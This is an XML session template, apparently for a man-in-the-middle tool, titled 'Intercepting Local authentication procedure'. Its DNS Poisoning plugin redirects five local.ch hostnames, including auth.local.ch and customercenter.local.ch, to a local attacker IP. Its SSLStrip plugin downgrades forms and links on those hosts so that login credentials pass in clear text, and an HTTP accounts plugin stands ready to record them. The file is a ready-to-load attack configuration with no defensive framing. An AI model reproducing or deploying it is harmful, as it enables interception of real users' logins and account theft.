	<SessionTemplate>
<Config name="authentication_local" description="Intercepting Local authentication procedure">
</Config>
<Plugins>

<Plugin name="DNS Poisoning" dirname="DNSPoisoning">

<ArrayOfDNSPoisonRecord xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <DNSPoisonRecord>
    <HostName>auth.local.ch</HostName>
    <IPAddress>192.168.43.133</IPAddress>
  </DNSPoisonRecord>
  <DNSPoisonRecord>
    <HostName>customercenter.local.ch</HostName>
    <IPAddress>192.168.43.133</IPAddress>
  </DNSPoisonRecord>
  <DNSPoisonRecord>
    <HostName>www.local.ch</HostName>
    <IPAddress>192.168.43.133</IPAddress>
  </DNSPoisonRecord>
  <DNSPoisonRecord>
    <HostName>i.local.ch</HostName>
    <IPAddress>192.168.43.133</IPAddress>
  </DNSPoisonRecord>
  <DNSPoisonRecord>
    <HostName>local.ch</HostName>
    <IPAddress>192.168.43.133</IPAddress>
  </DNSPoisonRecord>
</ArrayOfDNSPoisonRecord>
</Plugin>

<Plugin name="HTTP accounts" dirname="HTTPAccounts">

<PluginData xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <Records />
</PluginData>
</Plugin>

<Plugin name="SSLStrip" dirname="SSLStrip">

<ArrayOfSSLStripRecord xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <SSLStripRecord>
    <HostName>auth.local.ch</HostName>
    <ContentType>text/html</ContentType>
    <Tag>form</Tag>
  </SSLStripRecord>
  <SSLStripRecord>
    <HostName>auth.local.ch</HostName>
    <ContentType>text/html</ContentType>
    <Tag>a</Tag>
  </SSLStripRecord>
  <SSLStripRecord>
    <HostName>customercenter.local.ch</HostName>
    <ContentType>text/html</ContentType>
    <Tag>a</Tag>
  </SSLStripRecord>
  <SSLStripRecord>
    <HostName>customercenter.local.ch</HostName>
    <ContentType>text/html</ContentType>
    <Tag>form</Tag>
  </SSLStripRecord>
  <SSLStripRecord>
    <HostName>www.local.ch</HostName>
    <ContentType>text/html</ContentType>
    <Tag>form</Tag>
  </SSLStripRecord>
  <SSLStripRecord>
    <HostName>www.local.ch</HostName>
    <ContentType>text/html</ContentType>
    <Tag>a</Tag>
  </SSLStripRecord>
  <SSLStripRecord>
    <HostName>i.local.ch</HostName>
    <ContentType>text/html</ContentType>
    <Tag>a</Tag>
  </SSLStripRecord>
  <SSLStripRecord>
    <HostName>i.local.ch</HostName>
    <ContentType>text/html</ContentType>
    <Tag>form</Tag>
  </SSLStripRecord>
  <SSLStripRecord>
    <HostName>local.ch</HostName>
    <ContentType>text/html</ContentType>
    <Tag>a</Tag>
  </SSLStripRecord>
  <SSLStripRecord>
    <HostName>local.ch</HostName>
    <ContentType>text/html</ContentType>
    <Tag>form</Tag>
  </SSLStripRecord>
</ArrayOfSSLStripRecord>
</Plugin>

</Plugins>
</SessionTemplate>
